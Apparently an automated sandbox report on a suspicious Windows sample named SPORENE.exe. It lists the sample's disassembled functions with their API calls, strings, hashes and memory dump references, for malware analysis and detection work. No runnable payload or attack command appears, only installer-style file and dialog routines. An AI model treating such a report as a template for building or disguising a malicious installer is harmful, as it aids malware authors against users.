Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,77313420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,77313420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

A, xrefs: 00404AAD
C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 00404AEB, 00404AF0, 00404AFB
C:\Users\user\AppData\Local\Temp, xrefs: 00404ADA

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\SPORENE.exe
API String ID: 2624150263-1116357713
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,77313420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,77313420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,77313420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

., xrefs: 00405D18
., xrefs: 00405D04
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
\*.*, xrefs: 00405CB4

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402269

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 542301482-670666241
Opcode ID: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
Opcode Fuzzy Hash: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85, Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C, Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

M, xrefs: 004050BA
, xrefs: 004054D4
N, xrefs: 0040519B

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A, Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
EnableWindow.USER32(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404658, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 00404835
N, xrefs: 004047F4

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: C:\Users\user\AppData\Local\Temp\SPORENE.exe$N
API String ID: 3103080414-1331774243
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

%ls=%ls, xrefs: 004061F8
[Rename], xrefs: 0040626C, 0040627E

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,773123A0), ref: 004066A8
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Strings

C:\Users\user\AppData\Local\Temp\SPORENE.exe, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
